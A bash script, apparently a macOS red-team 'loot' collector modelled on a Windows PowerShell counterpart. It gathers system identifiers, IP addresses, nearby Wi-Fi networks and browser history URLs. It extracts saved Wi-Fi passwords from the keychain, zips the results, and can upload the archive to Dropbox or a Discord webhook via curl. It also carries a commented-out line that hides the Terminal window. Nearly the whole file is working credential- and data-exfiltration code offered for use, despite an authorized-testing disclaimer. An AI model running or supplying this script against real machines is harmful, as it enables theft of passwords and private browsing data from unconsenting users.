#!/usr/bin/env bash
# macOS reconnaissance / information gathering script
# Similar spirit to the Windows .ps1 — collects system/user/network/browser data
# Most output goes into a folder + zip file
# WARNING: This script collects sensitive data. For authorized security testing / red-team use only.

set -u

# ────────────────────────────────────────────────
#  Config – fill in at least one if you want exfil
# ────────────────────────────────────────────────

DROPBOX_TOKEN=""           # optional Dropbox access token
DISCORD_WEBHOOK=""         # optional Discord webhook URL

# ────────────────────────────────────────────────
#  Preparation
# ────────────────────────────────────────────────

TIMESTAMP=$(date +%Y-%m-%d_%H-%M)
USERNAME=$(whoami)
LOOT_FOLDER="${USERNAME}-LOOT-${TIMESTAMP}"
LOOT_DIR="$TMPDIR${LOOT_FOLDER}"
ZIP_NAME="${LOOT_FOLDER}.zip"

mkdir -p "$LOOT_DIR" || exit 1

# Hide terminal window (if launched via .command double-click)
# osascript -e 'tell application "System Events" to set visible of process "Terminal" to false' 2>/dev/null

echo "[*] Starting collection → $LOOT_DIR"

# ────────────────────────────────────────────────
#  Basic system / user info
# ────────────────────────────────────────────────

echo "┌─ Basic Info ───────────────────────────────────────" > "$LOOT_DIR/computerData.txt"

echo "Username:          $USERNAME"                        >> "$LOOT_DIR/computerData.txt"
echo "Full name:         $(finger -m "$USERNAME" | head -n1 | awk '{print $2 " " $3 " " $4 " " $5}')" >> "$LOOT_DIR/computerData.txt"
echo "Hostname:          $(scutil --get ComputerName)"     >> "$LOOT_DIR/computerData.txt"
echo "Local hostname:    $(scutil --get LocalHostName)"    >> "$LOOT_DIR/computerData.txt"
echo "macOS version:     $(sw_vers -productVersion)"       >> "$LOOT_DIR/computerData.txt"
echo "Build:             $(sw_vers -buildVersion)"         >> "$LOOT_DIR/computerData.txt"
echo "Model:             $(sysctl hw.model | cut -d: -f2- | xargs)" >> "$LOOT_DIR/computerData.txt"
echo "CPU:               $(sysctl -n machdep.cpu.brand_string)" >> "$LOOT_DIR/computerData.txt"
echo "Memory:            $(system_profiler SPHardwareDataType | grep Memory | awk -F: '{print $2}' | xargs)" >> "$LOOT_DIR/computerData.txt"
echo "Serial:            $(ioreg -l | grep IOPlatformSerialNumber | cut -d\" -f4)" >> "$LOOT_DIR/computerData.txt"

# Public IP
PUBLIC_IP=$(curl -s https://api.ipify.org || echo "Failed to get public IP")
echo "Public IP:         $PUBLIC_IP"                        >> "$LOOT_DIR/computerData.txt"

# Local IPs
echo -e "\nLocal network interfaces:"                      >> "$LOOT_DIR/computerData.txt"
ifconfig | grep -A 3 "inet " | grep -v inet6 | grep -v 127.0.0.1 >> "$LOOT_DIR/computerData.txt" 2>/dev/null

# ────────────────────────────────────────────────
#  Wi-Fi networks & saved passwords
# ────────────────────────────────────────────────

echo -e "\n┌─ Wi-Fi ────────────────────────────────────────────" >> "$LOOT_DIR/computerData.txt"

# Current Wi-Fi network
CURRENT_SSID=$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk -F': ' '/ SSID/ {print $2}')
echo "Current SSID:      $CURRENT_SSID"                    >> "$LOOT_DIR/computerData.txt"

# Saved Wi-Fi passwords (requires admin privileges → will prompt)
echo -e "\nSaved Wi-Fi passwords (may prompt for password):" >> "$LOOT_DIR/computerData.txt"
for plist in ~/Library/Preferences/com.apple.airport.preferences.plist /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist; do
  if [[ -f "$plist" ]]; then
    defaults read "$plist" KnownNetworks 2>/dev/null | grep -A1 SSIDString | grep SSIDString | awk '{print $3}' | tr -d '";' | while read -r ssid; do
      pass=$(security find-generic-password -D "AirPort network password" -a "$ssid" -w 2>/dev/null)
      [[ -n "$pass" ]] && echo "$ssid : $pass" >> "$LOOT_DIR/computerData.txt"
    done
  fi
done

# Nearby visible networks (requires airport tool)
echo -e "\nNearby Wi-Fi networks:"                          >> "$LOOT_DIR/computerData.txt"
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s | head -n 30 >> "$LOOT_DIR/computerData.txt" 2>/dev/null

# ────────────────────────────────────────────────
#  Browser data – crude URL extraction
# ────────────────────────────────────────────────

echo -e "\n┌─ Browser artifacts (URLs only) ───────────────────" >> "$LOOT_DIR/BrowserData.txt"

# Chrome / Chromium-based (history + bookmarks)
for path in \
  "~/Library/Application Support/Google/Chrome/Default/History" \
  "~/Library/Application Support/Google/Chrome/Default/Bookmarks" \
  "~/Library/Application Support/Microsoft Edge/Default/History" \
  "~/Library/Application Support/Microsoft Edge/Default/Bookmarks"; do
  expanded=$(eval echo "$path")
  if [[ -f "$expanded" ]]; then
    echo "→ Found: $path" >> "$LOOT_DIR/BrowserData.txt"
    strings "$expanded" 2>/dev/null | grep -Eai 'https?://' | sort -u | head -n 300 >> "$LOOT_DIR/BrowserData.txt"
    echo -e "\n" >> "$LOOT_DIR/BrowserData.txt"
  fi
done

# Firefox (places.sqlite)
for ff in ~/Library/Application\ Support/Firefox/Profiles/*.default*/places.sqlite; do
  if [[ -f "$ff" ]]; then
    echo "→ Firefox places.sqlite found" >> "$LOOT_DIR/BrowserData.txt"
    strings "$ff" 2>/dev/null | grep -Eai 'https?://' | sort -u | head -n 300 >> "$LOOT_DIR/BrowserData.txt"
  fi
done

# Safari (History.db is better but requires sqlite3 → simple plist fallback)
if [[ -f ~/Library/Safari/History.plist ]]; then
  echo "→ Safari History.plist" >> "$LOOT_DIR/BrowserData.txt"
  plutil -p ~/Library/Safari/History.plist 2>/dev/null | grep -Eai 'http' | head -n 200 >> "$LOOT_DIR/BrowserData.txt"
fi

# ────────────────────────────────────────────────
#  More artifacts
# ────────────────────────────────────────────────

echo -e "\n┌─ Other ────────────────────────────────────────────" >> "$LOOT_DIR/computerData.txt"

# Startup / Login items
echo -e "\nLogin Items:" >> "$LOOT_DIR/computerData.txt"
osascript -e 'tell application "System Events" to get the name of every login item' >> "$LOOT_DIR/computerData.txt" 2>/dev/null

# LaunchAgents / LaunchDaemons (user level)
echo -e "\nUser LaunchAgents:" >> "$LOOT_DIR/computerData.txt"
ls -la ~/Library/LaunchAgents 2>/dev/null >> "$LOOT_DIR/computerData.txt"

# Recent items (crude)
echo -e "\nRecent files (ls -lat ~ | head):" >> "$LOOT_DIR/computerData.txt"
ls -lat ~ | head -n 40 >> "$LOOT_DIR/computerData.txt"

# Disks
echo -e "\nDisks:" >> "$LOOT_DIR/computerData.txt"
df -h >> "$LOOT_DIR/computerData.txt"

# ────────────────────────────────────────────────
#  Packaging
# ────────────────────────────────────────────────

echo "[*] Compressing loot..."
ditto -c -k --sequesterRsrc --keepParent "$LOOT_DIR" "$TMPDIR/$ZIP_NAME"

# Optional Dropbox upload
if [[ -n "$DROPBOX_TOKEN" ]]; then
  echo "[*] Uploading to Dropbox..."
  curl -X POST https://content.dropboxapi.com/2/files/upload \
    --header "Authorization: Bearer $DROPBOX_TOKEN" \
    --header "Dropbox-API-Arg: {\"path\": \"/${ZIP_NAME}\",\"mode\": \"add\",\"autorename\": true}" \
    --header "Content-Type: application/octet-stream" \
    --data-binary @"$TMPDIR/$ZIP_NAME"
fi

# Optional Discord upload
if [[ -n "$DISCORD_WEBHOOK" ]]; then
  echo "[*] Sending to Discord..."
  curl -F file=@"$TMPDIR/$ZIP_NAME" "$DISCORD_WEBHOOK"
fi

# ────────────────────────────────────────────────
#  Clean up (optional – comment out during testing)
# ────────────────────────────────────────────────

# rm -rf "$LOOT_DIR" "$TMPDIR/$ZIP_NAME" 2>/dev/null

echo "[*] Done. Zip file: $TMPDIR/$ZIP_NAME"